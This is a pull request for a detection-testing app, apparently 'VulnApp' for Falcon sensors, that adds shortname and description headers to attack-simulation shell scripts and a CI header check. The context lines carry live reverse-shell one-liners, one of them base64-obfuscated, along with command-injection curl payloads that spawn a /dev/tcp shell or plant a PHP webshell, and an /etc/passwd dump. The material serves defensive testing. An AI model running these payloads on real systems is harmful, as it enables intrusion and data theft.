### PR TITLE
feat: add script shortname and descriptions to the shell scripts for VulnApp

### DIFF
--- a/.github/workflows/lint-scripts.yml
+++ b/.github/workflows/lint-scripts.yml
@@ -1,0 +1,50 @@
+name: Lint script headers
+
+on:
+  pull_request:
+    paths:
+      - 'bin/*.sh'
+  push:
+    paths:
+      - 'bin/*.sh'
+
+jobs:
+  check-headers:
+    name: Validate bin/ script headers
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+
+    steps:
+      - name: Checkout project
+        uses: actions/checkout@08c6903cd8c0fde910a37f88322edcfb5dd907a8 # v5.0.0
+
+      - name: Check script headers
+        run: |
+          failed=0
+          for script in bin/*.sh; do
+            [ -f "$script" ] || continue
+            name=$(basename "$script")
+            line1=$(sed -n '1p' "$script")
+            line2=$(sed -n '2p' "$script")
+            line3=$(sed -n '3p' "$script")
+
+            if ! echo "$line1" | grep -qE '^#!'; then
+              echo "FAIL: $name: line 1 is not a shebang (got: $line1)"
+              failed=1
+              continue
+            fi
+            if ! echo "$line2" | grep -qE '^# Shortname: .+'; then
+              echo "FAIL: $name: line 2 missing '# Shortname: <name>' (got: $line2)"
+              failed=1
+            fi
+            if ! echo "$line3" | grep -qE '^# Description: .+'; then
+              echo "FAIL: $name: line 3 missing '# Description: <text>' (got: $line3)"
+              failed=1
+            fi
+          done
+
+          if [ "$failed" -eq 0 ]; then
+            echo "OK: all scripts in bin/ have valid headers"
+          fi
+          exit "$failed"

--- a/bin/Collection_via_Automated_Collection.sh
+++ b/bin/Collection_via_Automated_Collection.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: credentials_dumping_collection
+# Description: Attempts to dump credentials from /etc/passwd to /tmp/passwords.
 
 echo -e "\e[92mExecuting Collection via Automated Collection script. Trying to dump information from etc/passwd"
 sh -c "/bin/grep 'x:0:' /etc/passwd > /tmp/passwords"

--- a/bin/Command_Control_via_Remote_Access-obfuscated.sh
+++ b/bin/Command_Control_via_Remote_Access-obfuscated.sh
@@ -1,4 +1,7 @@
 #!/bin/sh
+# Shortname: reverse_shell-obfuscated
+# Description: Attempts to connect to a remote IP address and will exit at
+#   fork. Falcon Prevent will kill the attempt. (obfuscated version)
 
 echo -e "\e[92mExecuting Command and Control via Remote Access Tools using obfuscated Python script. A Falcon Prevent action can kill the attempt"
 python -c 'import base64;dec=base64.b64decode("aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE3Mi4xNy4wLjIxIiw1NTU1KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItIl0pOw==");eval(compile(dec,"<string>","exec"))'

--- a/bin/Command_Control_via_Remote_Access.sh
+++ b/bin/Command_Control_via_Remote_Access.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: reverse_shell
+# Description: Attempts to connect to a remote IP address and will exit at fork. Falcon Prevent will kill the attempt.
 
 echo -e "\e[92mExecuting Command and Control via Remote Access Tools using Ruby script. This script will try to connect to 192.168.1.222 and will exit at fork. A Falcon Prevent action can kill the attempt"
 ruby -rsocket -e'exit if fork;s=TCPSocket.new("192.168.1.222",4444);loop do;cmd=gets.chomp;s.puts cmd;s.close if cmd=="exit";puts s.recv(1000000);end' 

--- a/bin/ContainerDrift_Via_File_Creation_and_Execution.sh
+++ b/bin/ContainerDrift_Via_File_Creation_and_Execution.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: container_drift
+# Description: Container Drift via file creation script. Creating a file and then executing it.
 
 echo -e "\e[92mExecuting Container Drift via file creation script. Creating a file and then executing it."
 sh -c "rm -f /bin/id2 ; cp /bin/id /bin/id2; /bin/id2 > /dev/null"

--- a/bin/Credential_Access_via_Credential_Dumping.sh
+++ b/bin/Credential_Access_via_Credential_Dumping.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: credentials_dumping
+# Description: Runs mimipenguin and tries to dump passwords from inside the container environment.
 
 SCRIPT_DIR=$(cd "$(dirname "$0")" && pwd)
 

--- a/bin/Defense_Evasion_via_Rootkit.sh
+++ b/bin/Defense_Evasion_via_Rootkit.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: rootkit
+# Description: This script will change the group owner of /etc/ld.so.preload to 0, indicative of a Jynx Rootkit.
 
 echo -e "\e[92mExecuting Defense Evasion via Rootkit. This script will change the group owner to '0' of /etc/ld.so.preload indicative for a Jynx Rootkit"
 touch /etc/ld.so.preload

--- a/bin/Execution_via_Command-Line_Interface.sh
+++ b/bin/Execution_via_Command-Line_Interface.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: suspicious_commands
+# Description: Emulate malicious activity related to suspicious CLI commands. Runs the command sh -c whoami '[S];pwd;echo [E]'.
 
-echo -e "\e[92mExecuting Execution via Command-Line Interface. This script is causing malicious activity related suspicious CLI commands"
+echo -e "\e[92mExecuting Execution via Command-Line Interface. This script is causing malicious activity related suspicious CLI commands."
 sh -c whoami '[S];pwd;echo [E]'

--- a/bin/Exfiltration_via_Exfiltration_Over_Alternative_Protocol.sh
+++ b/bin/Exfiltration_via_Exfiltration_Over_Alternative_Protocol.sh
@@ -1,6 +1,8 @@
 #!/bin/bash
+# Shortname: data_exfiltration
+# Description: Attempts to exfiltrate data using DNS dig requests that contain system data in the hostname.
 
-echo -e "\e[92mExecuting Exfiltration Over Alternative Protocol using a DNS tool sendng requests to large domain names. This will take a moment to execute..." 
+echo -e "\e[92mExecuting Exfiltration Over Alternative Protocol using a DNS tool sending requests to large domain names. This will take a moment to execute..." 
 
 cd /tmp
 touch {1..7}.tmp

--- a/bin/Impact_via_Data_Encrypted_for_Impact.sh
+++ b/bin/Impact_via_Data_Encrypted_for_Impact.sh
@@ -1,4 +1,7 @@
 #!/bin/sh
+# Shortname: ransomware
+# Description: Simulates LockBit file encryption by renaming files with the
+#   .lockbit extension
 #
 # Impact via Data Encrypted for Impact
 # LockBit-style ransomware simulation

--- a/bin/Persistence_via_External_Remote_Services.sh
+++ b/bin/Persistence_via_External_Remote_Services.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: remote_service_persistence
+# Description: Attempts to create persistence to 192.168.1.222 via External Remote Services via Python script. Falcon Prevent will kill the attempt.
 
-echo -e "\e[92mExecuting Persistence via External Remote Services via Python script. This script will try creating presistance to 192.168.1.222. A Falcon Prevent action can kill the attempt"
+echo -e "\e[92mExecuting Persistence via External Remote Services via Python script. This script will try creating persistence to 192.168.1.222. A Falcon Prevent action can kill the attempt."
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.17.0.21",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-"]);'

--- a/bin/Reverse_Shell_Trojan.sh
+++ b/bin/Reverse_Shell_Trojan.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: reverse_shell_trojan
+# Description: Executes an inert trojan that will attempt to connect to 192.168.0.1 on TCP port 444. Aggressive Machine Learning prevention policy settings will kill the attempt.
 
 SCRIPT_DIR=$(cd "$(dirname "$0")" && pwd)
 

--- a/bin/Webserver_Bash_Reverse_Shell.sh
+++ b/bin/Webserver_Bash_Reverse_Shell.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: data_exfiltration
+# Description: Attempts Command Injection to execute reverse shell.
 
 echo -e "\e[92mExecuting Command Injection to execute reverse shell."
 curl -X POST -d "ip=1.1.1.1+%26%26+bash+-i+%3E%26+%2Fdev%2Ftcp%2F172.17.0.21%2F1111+0%3E%261&Submit=Submit" http://localhost/low.php

--- a/bin/Webserver_Suspicious_Terminal_Spawn.sh
+++ b/bin/Webserver_Suspicious_Terminal_Spawn.sh
@@ -1,5 +1,7 @@
 #!/bin/sh
+# Shortname: command_injection-suspicious_terminal
+# Description: Executes a command injection to Spawn a Suspicious Terminal using PHP.
 
-echo -e "\e[92mExecuting Command Injection to Spawn a Suspicious Terminal. This script excutes a command injection, which writes a file to http://webserver/uploads/test.php, then executes that script"
+echo -e "\e[92mExecuting Command Injection to Spawn a Suspicious Terminal. This script executes a command injection, which writes a file to http://webserver/uploads/test.php, then executes that script"
 curl -X POST -d "ip=1.1.1.1+%26%26+echo+%27%3C%3Fphp+shell_exec%28%22whoami%22%29%3B+%3F%3E%27+%3E+uploads%2Ftest.php&Submit=Submit" http://localhost/low.php
 curl http://localhost/uploads/test.php

--- a/bin/Webserver_Unexpected_Child_of_Web_Service.sh
+++ b/bin/Webserver_Unexpected_Child_of_Web_Service.sh
@@ -1,4 +1,6 @@
 #!/bin/sh
+# Shortname: data_exfiltration
+# Description: Executing Command Injection to dump MySQL Server tables.
 
 echo -e "\e[92mExecuting Command Injection to dump MySQL Server tables."
 curl -X POST -d "ip=1.1.1.1+%26%26+mysqldump+-u&Submit=Submit" http://localhost/low.php


### PR DESCRIPTION
Requiring these allow vulnapp to auto generate the script info and path to reduce the error prone manual process of adding scripts to vulnapp. This also adds a CI job to make sure that scripts under the bin directory (except in deeper folders) have the required info for vulnapp to take advantage of.